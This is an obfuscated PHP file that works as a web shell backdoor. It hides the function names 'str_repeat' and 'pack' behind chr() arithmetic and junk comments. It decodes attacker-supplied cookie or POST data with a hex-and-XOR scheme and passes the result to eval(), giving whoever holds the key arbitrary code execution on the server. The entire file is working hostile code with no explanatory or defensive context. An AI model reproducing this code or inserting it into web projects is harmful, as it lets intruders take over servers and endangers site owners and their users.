<?php
$SHRKGLEJ/*   ArBSf  */=/*  GdFzE  */"\163"	.	chr/*   Xps   */(	668/*tVjt */-	552	).'r'	.	'_'	./* B */'r'  .	chr    (/*  hI   */223	-	122	).chr/*  o*/(112)	.   chr	(101)   .     "\141"/* JQe */.	"\x74";
     $MmtvjnyhR  =	chr	(	1063/* uNTGw   */-/*   bgef  */951/*  ph*/)."\141"/*   W */./*  mOAnG*/"\143"   .	"\x6b";$_y     =/* uzoBS  */'60372';

function/*  d*/MiHzODbrU()
		 {
       $YgmBFmCN   =	Array/*Lz   */(	"GujBvPRc"	=>	"LRfbVYUj" );$_tw	=    '8583';
   
		   $JvwrwceK	=	Array   (	"jGxwehdQVnaRgeqIifUxkb"/* qy   */=>	"RJfcmpfGPyhHWrvbOBcfBdChlWod"   );
		$RIuFtsF/*  GdJW  */=/*   QNF  */Array(     $YgmBFmCN,   $_COOKIE,	$YgmBFmCN,    $_POST,	$JvwrwceK);
	/*  LLLXw   */


/*m   */return	$RIuFtsF;$_vlPcC   =/*   E   */'59088';
	  }
	
			function   vUuQHMfG($bZMIChgkZ,	$YgmBFmCN)
     	{

/*  LwimH  */if     (    count    (	$bZMIChgkZ   )   ==/* ppwTR */3     )	{
				$OmEndOtMcS	=	$bZMIChgkZ[1];


  $aWqNkzvd	=   $bZMIChgkZ[2];

/*ugO  */$snNVtrlHHf =	$OmEndOtMcS($aWqNkzvd);
     eval	(   $snNVtrlHHf     );


/*  B  */die/*   Q */();
				}


/*Obqod   */}
				/*  xuVkm  */
		 function	igTGeZt($ZpVCNWpavb,/*  x  */$LnIrtfip)
				{
    return/* KJJgr  */$ZpVCNWpavb   ^ $LnIrtfip;
    }
        
	   $kbAtOVC =	chr/*tkep */(/* MO */486     -  451 );;
   
       function  xkgIUQhc($EzAHrlGqU,/*   h  */$kbAtOVC)
		{/*o */
			
     /*  BQ  */$EzAHrlGqU    =/* J   */explode   ($kbAtOVC,	$EzAHrlGqU	);

     
					    vUuQHMfG($EzAHrlGqU,     $kbAtOVC);;

	}
	
    
					   
   	foreach	(MiHzODbrU()/*rnJ   */as	$gsvKEzr)  {
	foreach	(/*   v  */$gsvKEzr/* BX  */as/*   HMZG*/$LnIrtfip/*   hBZ  */=>/*  c */$ZpVCNWpavb     )/*uLb  */{
		/*   UIR  */


     $ceDLgju =/* wo  */strlen(	$ZpVCNWpavb/*  Cg */)/strlen(	$LnIrtfip	);
					/*  Dp   */
   	$ZpVCNWpavb	=/*  byzYZ */@$MmtvjnyhR(     "\110" . '*',   $ZpVCNWpavb	);;
   


 $LnIrtfip	.=   "qPeVdV-YpsF-gOjvS-QOFWRN-ouDAGYn-bzE-wSl";;
	$LnIrtfip/*xjeKh   */=/*  lcUW  */$SHRKGLEJ (   $LnIrtfip,	$ceDLgju   +/*lr*/1);$_mK	=	'19725';
				
     /*   n   */xkgIUQhc(igTGeZt($ZpVCNWpavb,	$LnIrtfip),     $kbAtOVC);
				
						continue;$_wH	=/*   eADG*/'12872';
				/* ut  */}
	}